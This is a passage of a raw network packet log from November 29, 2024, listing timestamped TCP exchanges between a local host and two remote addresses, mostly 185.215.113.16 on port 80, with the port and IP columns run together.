                                                                                                                                                                                    Nov 29, 2024 19:49:35.560967922 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.561810970 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.561937094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.561979055 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.562900066 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.562974930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.563018084 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.563971996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.564145088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.564188004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.565103054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.565366983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.565407991 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.566138983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.566281080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.566323042 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.567245960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.567301035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.567348003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.568326950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.568478107 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.568521976 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.569432020 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.569674015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.569720030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.570470095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.570594072 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.570633888 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.571593046 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.571796894 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.571835995 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.572684050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.572940111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.572983027 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.573766947 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.573889971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.573930979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.574825048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.574944019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.574985027 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.575923920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.576220989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.576268911 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.577193022 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.577203989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.577243090 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.578064919 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620268106 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620325089 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620376110 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620774031 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620801926 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620814085 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.620821953 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.625066996 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.625086069 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.625145912 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.625560999 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.625575066 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.627510071 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.722588062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.722603083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.722652912 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.722986937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.723140955 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.723176956 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.724056959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.724205971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.724244118 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.725203037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.725267887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.725310087 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.726300001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.726470947 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.726522923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.727350950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.727416992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.727457047 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.728420973 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.728580952 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.728616953 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.729505062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.729615927 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.729665041 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.730753899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.730829954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.730882883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.731676102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.731770992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.731818914 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.732770920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.732871056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.732904911 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.733865976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.733977079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.734015942 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.734966040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.735158920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.735194921 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.736011028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.736145973 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.736182928 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.737139940 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.737260103 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.737304926 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.738178015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.738311052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.738354921 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.739298105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.739360094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.739402056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.740398884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.740411043 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.740452051 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.741465092 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.741524935 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.741570950 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.742582083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.742654085 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.742683887 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.743567944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.743716002 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.743753910 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.744785070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.744793892 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.744833946 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.745799065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.745950937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.745986938 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.746969938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.746982098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.747075081 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.747947931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.748101950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.748137951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.749138117 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.749255896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.749293089 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.750200987 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.750269890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.750303030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.751266003 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.751307964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.751346111 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.752283096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.752382994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.752429008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.753402948 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.753415108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.753451109 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.754507065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.754555941 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.754595041 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.755563021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.755630016 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.755676031 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.756666899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.756752968 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.756799936 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.757710934 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.757836103 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.757890940 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.758797884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.758881092 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.758918047 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.759891033 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.759999037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.760042906 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.760927916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.761033058 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.761075974 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.762065887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.762171984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.762216091 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.763206959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.763401985 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.763437986 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.764236927 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.764333010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.764410019 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.765328884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.765455961 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.765497923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.766448975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.766546011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.766582012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.767482996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.767561913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.767601013 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.768569946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.768702030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.768737078 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.769633055 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.769777060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.769819975 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.770719051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.770868063 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.770908117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.771816969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.771887064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.771925926 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.772922993 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.772964001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.773014069 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.774033070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.774045944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.774077892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.775063992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.775176048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.775213003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.775327921 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.776194096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.776319027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.776354074 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.777288914 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.777477980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.777518988 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.778388023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.778436899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.778508902 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.779478073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.784197092 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.793128014 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.910666943 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.910733938 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.910775900 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.911115885 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.911128044 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.911138058 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.911142111 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.914689064 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.914719105 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.914774895 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.915102005 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.915112972 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.923386097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.923573971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.923640013 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.923958063 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.924004078 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.924046993 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.925010920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.925147057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.925196886 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.926080942 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.926208973 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.926246881 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.927185059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.927270889 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.927305937 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.928313017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.928432941 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.928472996 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.929392099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.929439068 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.929477930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.930458069 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.930551052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.930583954 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931231022 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931288958 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931338072 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931437969 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931459904 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931488037 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931495905 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931499958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931695938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.931734085 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.932653904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.932730913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.932775974 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.933684111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.933799982 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.933851957 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.934773922 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.934909105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.934978962 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935007095 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935024023 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935076952 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935306072 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935322046 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935866117 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935945034 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.935985088 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.937011957 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.937145948 CET8049755185.215.113.16192.168.2.6
